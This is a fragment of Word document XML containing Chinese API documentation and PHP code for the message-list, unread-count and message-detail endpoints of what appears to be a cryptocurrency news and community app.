    <w:p w14:paraId="2A3981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7B33A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6D6F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ad' =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DFD7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6DA7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C0BC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81563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 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户阅读消息成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079EE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D170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E07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579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消息不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569091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260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DA3D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7C9D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ssage/index </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取当前用户的消息列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B5A9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当前用户的消息列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2EC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44A908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3ADE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62BEE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ype_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-@</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提醒和回复；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系统公告；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>价格提醒）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52010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read     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息分类是否已读（非必填：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未读；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已读）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BED42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当前用户的消息列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281E8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d             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376408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_id        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A6D1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_name      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息类型名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B62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rticle_id        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431AD3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ircle_id         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7732E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ircle_article_id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F47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in_name         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F365B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          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236A8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ymbol            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B0E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消息内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ECCD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ink            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息相关链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14914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ender_username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送者姓名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2392B3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ender_img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E036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关注该消息发送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733B7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reate_time    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA27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update_time    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息阅读时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105ED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20F667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27EA79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3186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2BF00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C605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4C83D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cipient_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EE9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D4058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8882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49FC0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54001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7FE2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0F4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param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31982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ad = input('param.read', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3462C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 != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92C4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_id'] = $type_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129608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CE30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read != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213189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ad'] = $read;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047A7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951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 = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5FD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0A823E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read`' =&gt; 'asc', 'create_time' =&gt; 'desc'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419406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6C5F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my_messages) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54056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my_messages as $key =&gt; $my_message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAE3F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sender_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB5B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sender_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF46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follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA76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nder = _user($my_message['sender_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABBF4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sender)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A1DB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sender_username'] = $sender['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6780F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sender_img'] = $sender['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B78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248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91291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follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386E71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my_message['sender_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000EC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53105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47B17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32E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type_name'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49868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_message['type_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4989C7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type_name'] = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BF1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y_message['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDDB0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06C01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791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coin_name'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE27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_message['coin_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FFE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 = Db::name('coin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F92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y_message['coin_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4C8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8FD7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oin)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F71E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_messages[$key]['coin_name'] = $coin['currency'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F850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3D9A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68A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BED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DC54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my_messages);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3B4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5FF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A32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ssage/unread_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取当前用户的未读消息数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A92F3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当前用户的未读消息数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A1B1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201835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BBF50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57017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ype_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-@</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提醒和回复；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系统公告；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>价格提醒）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483652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Json} result           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6718E4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unread_num    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户的未读消息数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410F8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0CC0DE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E2B5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075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nread_num()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18360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AA3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89C67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cipient_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03315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773C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0E266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1888D9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4FCA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C17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13D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 = input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A4B9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_id != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B3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_id'] = $type_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE41A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DB4C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ad'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64116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read_num = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEC1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1D2E9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1F0BD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3B3F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read_num' =&gt; $unread_num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEB2B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F53A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C561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37A2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ssage/info </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取消息详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068F8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消息详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661DB9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用户消息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D65F6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BA8B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428FF8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message_id    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283E29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用户消息详情数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C2B1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消息</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1-@</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提醒和回复；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系统公告；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>价格提醒）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F32C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_id             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6BA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ype_name           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息类型名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E405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article_id          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069758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ircle_id           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772F5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ircle_article_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D96E4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in_id             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D74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in_name           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D86E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xchange            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8DC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ymbol              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3838E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ontent             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7369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link                </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息相关链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38955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ender_username     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
